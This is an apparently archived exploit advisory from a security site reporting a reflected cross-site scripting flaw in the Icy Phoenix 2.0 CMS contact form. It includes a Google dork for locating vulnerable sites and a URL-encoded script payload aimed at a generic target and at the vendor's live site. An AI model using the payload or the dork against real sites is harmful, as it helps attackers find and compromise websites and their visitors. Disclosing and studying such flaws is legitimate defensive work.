Icy Phoenix 2.0 Cross Site Scripting

2012.10.09
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Icy Phoenix 2.0 CMS Remote Cross Site Scripting Vulnerability <<!>> Found by : kurdish hackers team <<!>> C0ntact : pshela [at] YaHoo .com <<!>> Groups : Kurd-Team <<!>> site : www.kurdteam.org ======================================================= +++++++++++++++++++ Script information+++++++++++++++++ ======================================================= <<->> script :: Icy Phoenix 2.0 CMS <<->> home script :: http://www.icyphoenix.com/dload.php?action=file&file_id=178 ======================================================= +++++++++++++++++++++++ Exploit +++++++++++++++++++++++ ======================================================= <<->> google dork : Powered by Icy Phoenix or Design by Mighty Gorgon <<->> Exploit :: >>> www.site/path /contact_us.php?sid=9a2caa067fb983a628f27d1504eeb4a0^sender=&subject=%22%3E%3Cscript%3Ealert('hacked%20by%20kurdteam')%3C/script%3E&cc_email=1&confirm_code=&confirm_id=87cea145adae9369a3b296917a1dd501&submit=Send+e-mail demo: http://www.icyphoenix.com/contact_us.php?sid=9a2caa067fb983a628f27d1504eeb4a0^sender=&subject=%22%3E%3Cscript%3Ealert('hacked%20by%20kurdteam')%3C/script%3E&cc_email=1&confirm_code=&confirm_id=87cea145adae9369a3b296917a1dd501&submit=Send+e-mail ======================================================= ======================================================= <<->> All freinds , Zryan_kurd , all member kurdish hackers team

References:

http://www.icyphoenix.com/dload.php?action=file&file_id=178


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top